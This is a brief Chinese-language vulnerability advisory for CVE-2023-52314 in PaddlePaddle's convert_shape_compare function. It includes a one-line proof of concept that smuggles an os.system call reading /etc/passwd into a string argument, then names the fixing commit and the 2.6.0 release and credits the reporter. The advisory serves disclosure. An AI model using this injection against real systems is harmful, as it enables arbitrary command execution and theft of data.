CVE-2023-52314
convert_shape_compare存在命令注入漏洞,可造成任意命令执行,PoC代码如下:
import paddle
paddle.jit.dy2static.convert_operators.convert_shape_compare('prefix','+ str(__import__("os").system("cat /etc/passwd")) +','1')我们在commit c3b6414eb313480f1417abe92d410dfe89723097中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。
请参考我们的安全指南以获得更多关于安全的信息,以及如何与我们联系问题。
此漏洞由 leeya_bug 提交。